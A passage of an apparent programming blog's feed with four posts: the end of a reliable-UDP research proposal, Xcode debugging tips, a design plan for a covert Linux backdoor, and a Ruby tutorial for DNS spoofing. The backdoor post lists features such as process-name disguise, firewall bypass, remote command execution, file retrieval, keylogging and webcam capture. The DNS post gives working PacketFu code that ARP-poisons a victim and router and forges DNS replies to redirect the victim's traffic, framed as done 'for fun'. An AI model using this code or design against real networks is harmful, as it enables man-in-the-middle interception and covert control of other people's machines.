correctly. Three different RBUDP variants were designed, each with a different focus for storing and ordering the received packets. The three versions are broken down as follows:

  1. RBUDP with Scatter/Gather Optimization: this version assumes that most packets will be received in the correct order and that few packets will be lost due to the bandwidth calculations. Packets are first stored in memory assuming this, then checked and only moved if they are out of position.
  2. RBUDP without Scatter/Gather Optimization: this version checks each packet as it comes in and stores it in the correct location.
  3. Fake RBUDP: this version does not move packets and is just used to measure the overhead of RBUDP in comparison to standard UDP.
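The receiver’s bitmap tally and resend loop described above can be sketched in a few lines (Python, purely illustrative; the article does not specify the real bitmap encoding):

```python
def missing_packets(received_bitmap):
    """Given one boolean per packet, return the indices the sender must
    retransmit. The RBUDP resend cycle repeats until this list is empty."""
    return [i for i, got in enumerate(received_bitmap) if not got]
```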

The researchers concluded that RBUDP, when used with Scatter/Gather Optimization, functioned the best under most circumstances and will scale with faster networks. They also found that the protocol obtained the best results when used with large bulk transfers. This is due to the fact that receiving an acknowledgment through the TCP channel takes almost as long as the actual file transfers when using smaller files. The results of this study show that the performance of a dual protocol approach, using UDP for data and TCP for control signals, is tied to the speed at which acknowledgments can be returned to the sender over the TCP channel. Further research will have to be done to determine where the optimal balance is, and whether this technique would be a viable solution in creating a reliable UDP protocol for the general internet.

In the final research article in this review, “A Class of Reliable UDP-based Transport Protocols Based on Stochastic Approximation”, the researchers propose a different and more in-depth solution to the reliable UDP problem. The paper begins by describing the problems associated with the current TCP and UDP setup. TCP performs poorly, with low throughput, as a result of AIMD, or Additive Increase/Multiplicative Decrease, the algorithm used to control the flow of packets during a TCP connection. The outstanding issue with this design is that it keeps reducing its throughput as long as there are packet losses, even if there are only a few. Thus, throughput is usually below its optimal value with TCP, more so over lines with high bandwidth and long delay. With UDP the problem is reliability, as discussed at the beginning of this proposal. The researchers also address some of the other reliable UDP protocols created, such as SABUL and RBUDP, both discussed previously. While both of these protocols utilize available bandwidth far better than standard TCP, the way in which they do so usually starves other TCP traffic of bandwidth. Therefore, the researchers propose a new UDP-based protocol, Reliable UDP-based Network Adaptive Transport, or RUNAT, that has TCP-friendly flow control while still maintaining the fast speeds of UDP. In order to achieve this, the protocol implements a floating window-based transport model and uses a rate control strategy that is broken into three zones, outlined below.

  1. Packet loss rate is low; transmission speed should be increased.
  2. Maximum throughput with a non-zero loss rate.
  3. Packet loss rate is high; transmission speed should be decreased.
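The three-zone rate control can be sketched as a simple decision function (Python; the loss-rate thresholds and step factor here are invented for illustration — the real protocol derives its adjustments via stochastic approximation):

```python
def adjust_rate(rate, loss_rate, low=0.01, high=0.05, step=1.1):
    """Three-zone rate control sketch: speed up when loss is low (zone 1),
    slow down when loss is high (zone 3), hold in the middle (zone 2)."""
    if loss_rate < low:
        return rate * step      # zone 1: increase transmission speed
    if loss_rate > high:
        return rate / step      # zone 3: decrease transmission speed
    return rate                 # zone 2: near maximum throughput, hold
```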

The optimal zone is the center zone (two), with the edge zones (one and three) each attempting to push the throughput into the center zone. Once in the center zone, traffic is kept there using the dynamic Kiefer-Wolfowitz stochastic approximation method to control transmission speed. This method takes into account the randomness of network traffic and adjusts for it; the mathematics behind it is beyond the scope of this proposal. The researchers went on to perform tests using RUNAT on a variety of links. All of the tests showed that the protocol was easily able to adjust and make the most of the available bandwidth on each link, achieving 2-5 times the throughput of TCP without negatively affecting concurrent traffic on the line. This study brings up some interesting points regarding the congestion and flow control required in a reliable UDP protocol. If a new protocol is required to share the line with existing traffic, then it needs to take this into account and not obliterate other traffic with its burst speed.

Data Collection

The data collection must obtain data on the protocol’s reliability in delivering packets, its speed in comparison to UDP and TCP, and its ability to take advantage of the available throughput on the line. This will consist of an observational study, where the protocols are observed systematically while maintaining objectivity. There will be two different test beds in order to test the protocol over two different types of network lines.

  1. This test bed will consist of two machines, a server and a client, separated by an intercontinental link. This will test the protocol over a link that has a high bandwidth and long delay.
  2. This second test bed will consist of two machines, a server and a client, connected on an isolated network using a switch. This will provide a setting more often found in most local area networks.

Data will be obtained from these test beds as objectively as possible. To ensure this, the following limits will be put in place.

  • Reliability will be measured by performing an MD5 sum on the completed file transfer.
  • The maximum available throughput for TCP and UDP on a network line will be measured using Iperf.
  • The throughput of the new protocol will be measured using the complete transfer time and a tally of successfully received packets.
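The reliability check above is straightforward to express with Python’s standard hashlib (the file paths here are hypothetical):

```python
import hashlib

def md5_of(path):
    """Compute the MD5 digest of a file, reading it in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def transfer_is_reliable(original, received):
    """The transfer counts as reliable when the digests match."""
    return md5_of(original) == md5_of(received)
```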

Methodology

This study is intended to develop a reliable UDP protocol that takes full advantage of a network line’s available throughput while maintaining the overall speed of UDP. An observational research methodology will be followed in testing this newly designed protocol against the requirements put forward in this proposal.

Once the new protocol has been developed, it will be tested for reliability. This will entail transferring a file between the two systems on each test bed. The file will then be checked for validity via an MD5 sum.

After the reliability of the protocol has been established, it will be tested for speed. This will entail transferring a file between the two systems on each test bed using UDP, TCP, and the proposed reliable UDP. The file transfer time will be recorded for each protocol and then compared.

Finally, the protocol’s ability to take advantage of the available throughput on the communication line will be tested. First, the maximum available throughput will be measured using Iperf. Then the protocol will be used in a file transfer, with the packets received and transfer time used to calculate the attained throughput.

Data Analysis

For each of the sub-problems discussed at the beginning of this proposal, specific data needs to be collected and interpreted. The required data and how it is to be interpreted will now be discussed.

The first sub-problem is making the UDP protocol reliable. The data to prove that the protocol is reliable will be obtained from an observational study where the protocol is used to transfer data between two machines over a local area network and an intercontinental link. The collected data will consist of a file that has been transferred using the protocol and a tally of the number of retransmitted packets. The tally of retransmitted packets will be used to determine whether the protocol can still ultimately deliver a complete file. If there are dropped packets, and therefore hopefully retransmissions, the next part of the data is interpreted. The file portion of the data will be interpreted by running an MD5 checksum on the file. If the result of this checksum matches the result of the checksum on the original file even with dropped packets, then the protocol has reliably transmitted the file.

The second sub-problem is maintaining the overall speed of the underlying UDP protocol while implementing reliability. The data required for interpretation is the elapsed time of the file transfer from start to finish using the new protocol, along with the same statistic for ordinary TCP and UDP. With these values in hand, a comparison can be made between the three values. A successful time for the new protocol will appear between the UDP and TCP values, but leaning towards the UDP time. This is to be expected since the addition of reliability to the UDP protocol will increase its transmission time.

The third sub-problem is creating a protocol that will actively take advantage of the available throughput on the communication line. The data to be collected here consists of the maximum throughput of the line and then the achieved throughput of the new protocol. The available throughput will be measured using the tool Iperf. The throughput of the new protocol will be measured during the file transfer by taking the transfer time and successfully delivered packet value. A successful result here should be close to the available throughput calculated by the Iperf tool.
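The throughput calculation described here is simple arithmetic (Python sketch; the packet size and megabit units are assumptions, since the proposal does not fix them):

```python
def achieved_throughput_mbps(packets_delivered, packet_size_bytes, transfer_time_s):
    """Throughput in megabits per second, computed from the tally of
    successfully delivered packets and the measured transfer time."""
    bits = packets_delivered * packet_size_bytes * 8
    return bits / transfer_time_s / 1_000_000
```

The result can then be compared directly against the line capacity reported by Iperf.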

These tests will be run on both the test beds to determine if the protocol is useful for the general internet. Should the protocol fail to perform adequately on one test bed but perform well on another, then further research should be done to determine the cause of this. If the protocol performs well on both the test beds and successfully passes all tests then it can be deemed ready for the general internet.

Qualifications

The qualifications of the researcher include a Diploma in Computer Systems Technology, specializing in Data Communication and a Bachelor of Technology, specializing in Network Security Administration.

Study Outline

The study outline details the four overall steps required to design and then test the proposed protocol according to the requirements presented in this proposal. An outline of the proposed study and the steps required to complete it follows.

  1. Protocol needs to be designed according to the requirements outlined in this proposal.
  2. After the design work has been completed, the protocol can be coded according to the specifications.
  3. Once the protocol has been created, it needs to be tested against the requirements outlined in the first step. This is to ensure that it meets the requirements and specifications.
  4. The data collected from the tests in step three can be analyzed to determine the viability of implementing this protocol in the general internet.

References

 

Wu, Q., & Rao, N. (2005). A class of reliable UDP-based transport protocols based on stochastic approximation. (pp. 1013-1024).

He, E., Leigh, J., Yu, O., & DeFanti, T. (2002). Reliable Blast UDP: Predictable high performance bulk data transfer.

Tran, D. T., & Choi, E. (2007). A reliable UDP for ubiquitous communication environments.

Long, W., & Zhenkai. (2010). Performance analysis of reliable dynamic buffer UDP over wireless networks. (pp. 114-117).

Gu, Y., Hong, X., Mazzucco, M., & Grossman, R. (2002). SABUL: A high performance data transfer protocol.

]]>
http://crushbeercrushcode.org/2012/12/reliable-udp-research-proposal/feed/ 0
Four Tips for Debugging in XCode Like a Bro. http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/ http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/#comments Tue, 13 Nov 2012 19:06:25 +0000 Duncan Donaldson http://brogramming.org/brogramming/?p=247 Now, every self-respecting brogrammer out there should have at least experimented with developing iOS apps, and Apple has put a lot of time into making their development environment extremely friendly and usable (although sometimes less than stable). With that said, there have still been countless times when I’ve been sitting, sipping on my venti strawberry smoothie with double whey protein from Starbucks, working on my latest iPhone app, and beating my head against the wall thinking to myself: “Bro! How do I debug this stupid crash?!” So this article contains a collection of the most useful debugging features I’ve found in Xcode.

 

1. Enable NSZombie Objects

Enabling zombie objects is probably the most useful debugging feature I’ve used in the entire Xcode environment. These little guys make tracking down over-released objects much, MUCH easier by giving a concise error printout that states the class and memory location of the object that was over-released.

To enable zombie objects, open your scheme editor, either by opening the “Product” menu and selecting “Edit Scheme” or by using the hotkey ⌘<. Next, select the diagnostics tab of the scheme editor and check “Enable Zombie Objects”. That’s really all there is to it.

Now I’ve disabled automated reference counting (ARC) in my examples to make over-releases, exceptions and crashes easier to reproduce, but even with ARC enabled, over-released objects and memory related crashes can still occur. Now imagine some careless developer has gone and done something like this.

UIView* view = [[[UIView alloc] init] autorelease];
//...
//do something with view...clearly forgetting that it has been autoreleased.
//
[view release];

If you were to run this code, your view object would be over-released, your app would crash in the main function, and you would see something like this.

Enable zombie objects, and all of a sudden your debugger output looks something like this.

This may not seem like much in such a small example but in any decently sized project those few lines of debug output can be a goldmine of information.

 

2. Add a Global Breakpoint to All Exceptions

One thing Xcode loves to do when your application crashes or throws an exception is take you all the way to the main function, as you can see in the previous example. Wouldn’t it be nice if there was a way for the debugger to break on the line where the exception was thrown? Well, we’re in luck, because there is. Xcode has a nifty feature called exception breakpoints that lets you set a breakpoint that will only be hit when an exception is thrown. You can either tailor these breakpoints to specific exceptions or have them catch all exceptions.

To enable one of these breakpoints, go to the breakpoint navigator and hit the “add breakpoint” button on the bottom left. Then select “Add Exception Breakpoint” and make sure it is set to catch all exceptions.

Now, instead of breaking in your main function, the debugger will break at the line where the exception was thrown.

This will give you a good starting point for debugging thrown exceptions and reduce the time you spend sifting through files of code trying to trace an exception back to where it was thrown.

 

3. Static Analyzer

The Xcode static analyzer is a great tool for finding problems that won’t show up as compiler warnings or errors, like potential memory leaks and dead stores (unused values assigned to variables). It can be a great asset in improving memory usage and performance, as well as the overall stability and code quality of your application. To run a static analysis, open the Product menu in Xcode and select the “Analyze” option, or use the ⇧⌘B hotkey.

As you can see in the screenshot below a static analysis will catch any potential problems in your application and display them as blue warnings.

You can also set up your project to automatically run the static analyzer whenever you compile your application by opening your project file and setting the “Run Static Analyzer” option to YES, as shown below.

 

4. Conditional Breakpoints

The last tip I have for you today is conditional breakpoints. These are just regular old breakpoints that only break when a certain condition on a variable is met. They’re great if you want to catch a certain value on a variable in a loop without having to break on every iteration, or when hunting down fringe-case issues that don’t always occur. To set a conditional breakpoint, just set a regular breakpoint, then right-click on it and select “Edit Breakpoint”. This will open the breakpoint editor, where you can set your break condition (as well as a couple of other breakpoint settings); then just click the “Done” button. It really is that easy!

 

To Summarize…

With these tips, whether you’re a seasoned iOS developer or a fresh bro just wading into the iPhone app space, you should be able to quickly and efficiently debug most (read: at least half) of the big problems you’ll come across while developing iOS apps.

Got questions or comments? Leave them below, and maybe I’ll respond, or maybe I’ll completely ignore them, it’ll be one or the other.

]]>
http://crushbeercrushcode.org/2012/11/four-tips-for-debugging-in-xcode-like-a-bro/feed/ 0
Designing a Backdoor http://crushbeercrushcode.org/2012/11/designing-a-backdoor/ http://crushbeercrushcode.org/2012/11/designing-a-backdoor/#comments Mon, 05 Nov 2012 00:36:24 +0000 Luke Queenan http://brogramming.org/brogramming/?p=215 As any good brogrammer knows, designing before you code is usually a good idea. So today I’ll be taking you through the design work for a covert application I’ll be creating in the coming months. There are two parts to this application: a server component and a client component. The server will be the actual backdoor running on the compromised machine, and the client will be the program we use to communicate with it. The backdoor, or server, will be designed to run on Linux, written in C, and tested on Fedora 17. The client will also be written in C and should run on any *nix-based system.

Requirements

Let’s start with the requirements we would like the backdoor to have.

  • Disguise the process name; obviously, seeing “backdoor.out” running in top is going to give us away
  • Accept packets from behind the firewall (nothing should get in the way of a brogrammer’s backdoor)
  • Only accept packets that have our embedded passphrase contained within the header
  • Execute commands passed in the encrypted packet using the system() function
  • Return the results of the executed commands to the client application
  • Search for a file, retrieve its contents, and return them to the client
  • Open a covert channel back to the client for transmitting data

Some additional features that would be good to have if time permits.

  • Key logging with offline and real time functionality
  • Web camera control for taking pictures or video and uploading media back to the client

The requirements for the client application are fairly straightforward:

  • Encrypt passphrase into the header along with a command or filename
  • Listen for returning data

Now that the requirements of the application have been made clear, the actual design starts. For this application I’ll be doing state diagrams to define the behavior of the programs and pseudo code to flesh out the high-level code design.

State Diagrams

State diagrams are really useful for visualizing the application’s flow and function design. The backdoor application is presented first.

 

Next up is the client state diagram. As the diagram shows, the client is designed as a single command per execution.

Pseudo Code

The pseudo code shown here is fairly high level; no real functions are mentioned, and read and write loops are not shown. The pseudo code for the backdoor is up first.

[69-line pseudo code listing omitted]

Next up is the client pseudo code.

[37-line pseudo code listing omitted]

That concludes the design work I’ve done for the backdoor. All that’s left to do is some brogramming.

]]>
http://crushbeercrushcode.org/2012/11/designing-a-backdoor/feed/ 0
Ruby DNS Spoofing using Packetfu http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/ http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/#comments Mon, 29 Oct 2012 18:00:10 +0000 Luke Queenan http://brogramming.org/brogramming/?p=142 If you’ve ever wanted to know how to redirect people to random websites for fun, today is your lucky day. I’ll give a general overview of the program’s purpose, explain some of the key sections, and provide a link to the complete code on my Github account.

The goal here is to create a proof-of-concept DNS spoofer using the Ruby programming language, for use on a *nix-based system. The Packetfu gem is essential here for creating the raw packets. The program contains two parts: an ARP spoofer and a DNS spoofer. In order for the DNS queries made by the target machine to be directed to our machine, the target machine needs to believe that its DNS queries can be fulfilled at our IP. This is done by telling the target machine that we are the router, and telling the router that we are the target machine. We thus create a man in the middle, intercepting all DNS request traffic and responding with our own crafted DNS response packets. We can then direct all web traffic to a given IP address.

Since this is a proof-of-concept application, it is not heavily optimized for efficiency. However, it still achieves its purpose and has been designed to be as robust as possible given the constraints of the Ruby language. Due to the nature of the two tasks required for DNS spoofing, the program was designed to run as two separate processes: the ARP spoofing is carried out in a child process, while the packet capturing and sending of DNS responses is carried out in the parent process. This ensures the best performance possible.

Let’s start with the code for creating the ARP packets we’ll be sending to the target and router.

# Make the victim packet
@arp_packet_victim = PacketFu::ARPPacket.new()
@arp_packet_victim.eth_saddr = ourInfo[:eth_saddr]       # our MAC address
@arp_packet_victim.eth_daddr = victimMAC                 # the victim's MAC address
@arp_packet_victim.arp_saddr_mac = ourInfo[:eth_saddr]   # our MAC address
@arp_packet_victim.arp_daddr_mac = victimMAC             # the victim's MAC address
@arp_packet_victim.arp_saddr_ip = routerIP               # the router's IP
@arp_packet_victim.arp_daddr_ip = victimIP               # the victim's IP
@arp_packet_victim.arp_opcode = 2                        # arp code 2 == ARP reply
 
# Make the router packet
@arp_packet_router = PacketFu::ARPPacket.new()
@arp_packet_router.eth_saddr = ourInfo[:eth_saddr]       # our MAC address
@arp_packet_router.eth_daddr = routerMAC                 # the router's MAC address
@arp_packet_router.arp_saddr_mac = ourInfo[:eth_saddr]   # our MAC address
@arp_packet_router.arp_daddr_mac = routerMAC             # the router's MAC address
@arp_packet_router.arp_saddr_ip = victimIP               # the victim's IP
@arp_packet_router.arp_daddr_ip = routerIP               # the router's IP
@arp_packet_router.arp_opcode = 2                        # arp code 2 == ARP reply

These packets are then sent out at two-second intervals in an infinite loop. The pause between sending out the ARP packets needs to be small enough that the router is unable to reestablish a correct ARP entry for the target machine.

# Run until we get killed by the parent, sending out packets
while true
    sleep 2
    @arp_packet_victim.to_w(@interface)
    @arp_packet_router.to_w(@interface)
end

Now, with the ARP spoofing running, we can start intercepting DNS query packets from the target machine. The code to do this is fairly straightforward and is explained by the inline comments. Basically, the filter is set up to capture only packets matching a DNS query from the target machine. Once we receive a packet, we ensure that it is a query, grab the requested domain name (for the response packet), and call the response function.

# Start the capture process
filter = "udp and port 53 and src " + @victimIP
capture = Capture.new(:iface => @interface, :start => true,
                                :promisc => true,
                                :filter => filter,
                                :save => true)
 
# Find the DNS packets
capture.stream.each do |pkt|
    # Make sure we can parse the packet; if we can, parse it
    if UDPPacket.can_parse?(pkt)
        packet = Packet.parse(pkt)
 
        # Make sure we have a query packet
        dnsQuery = packet.payload[2].to_s + packet.payload[3].to_s
        if dnsQuery == '10'
 
            # Get the domain name into a readable format
            domainName = getDomainName(packet.payload[12..-1])
 
            if domainName == nil
                next
            end
 
            puts "DNS request for: " + domainName
 
            sendResponse(packet, domainName)
        end
    end
end
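The getDomainName helper called above isn’t shown in this excerpt; its job is to decode the DNS question name, where each label is prefixed by a length byte and the name ends with a zero byte. A rough equivalent in Python, for illustration only (the actual Ruby helper may differ):

```python
def parse_qname(data):
    """Decode a DNS question name: length-prefixed labels, zero-terminated.
    Returns the dotted domain name, or None if the data is malformed."""
    labels = []
    i = 0
    while i < len(data):
        length = data[i]
        if length == 0:
            return ".".join(labels)   # hit the terminator; name complete
        i += 1
        if i + length > len(data):
            return None               # truncated label
        labels.append(data[i:i + length].decode("ascii"))
        i += length
    return None                       # ran out of bytes before terminator
```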

The response function is the most technical portion of the program, since we have to construct a DNS response packet from scratch. I did this by capturing a sample session in Wireshark and then filling in the appropriate fields. I begin by taking the IP we are going to redirect the user to and packing it into four raw bytes using Ruby’s to_i and Array#pack methods. In this case we are using one of Facebook’s IPs, but this could be something far more interesting. From there we create a new UDP packet using the data contained in @ourInfo (IP and MAC) and fill in the normal UDP fields; I take most of this information straight from the DNS query packet. The next step is to create the DNS response. The best way to understand the code here is to look at a DNS header and then map the hex values onto the header bit by bit; this will show you which flags are being set. From there, we just calculate the checksum for the UDP packet and send it out to the target machine.

def sendResponse(packet, domainName)
 
    # Convert the IP address
    facebookIP = "69.171.234.21"
    myIP = facebookIP.split(".");
    myIP2 = [myIP[0].to_i, myIP[1].to_i, myIP[2].to_i, myIP[3].to_i].pack('c*')
 
    # Create the UDP packet
    response = UDPPacket.new(:config => @ourInfo)
    response.udp_src = packet.udp_dst
    response.udp_dst = packet.udp_src
    response.ip_saddr = packet.ip_daddr
    response.ip_daddr = @victimIP
    response.eth_daddr = @victimMAC
 
    # Transaction ID
    response.payload = packet.payload[0,2]
 
    response.payload += "\x81\x80" + "\x00\x01\x00\x01" + "\x00\x00\x00\x00"
 
    # Domain name
    domainName.split(".").each do |section|
        response.payload += section.length.chr
        response.payload += section
    end
 
    # Set more default values...........
    response.payload += "\x00\x00\x01\x00" + "\x01\xc0\x0c\x00"
    response.payload += "\x01\x00\x01\x00" + "\x00\x00\xc0\x00" + "\x04"
 
    # IP
    response.payload += myIP2
 
    # Calculate the packet
    response.recalc
 
    # Send the packet out
    response.to_w(@interface)
 
end

Now that the coding is out of the way, let’s take a look at some packet captures from our machine. First up is the DNS query packet received from the target machine. Note the request for bcit.ca.

After receiving this request, our machine sends out the faked DNS response. Note the Facebook IP in the response packet. This is what will send the target’s browser to Facebook.

So there you have it, a Ruby DNS Spoofer! If you would like to look at the complete code, it can be found in the following repo on my Github account. If you have questions, leave a comment.

]]>
http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/feed/ 1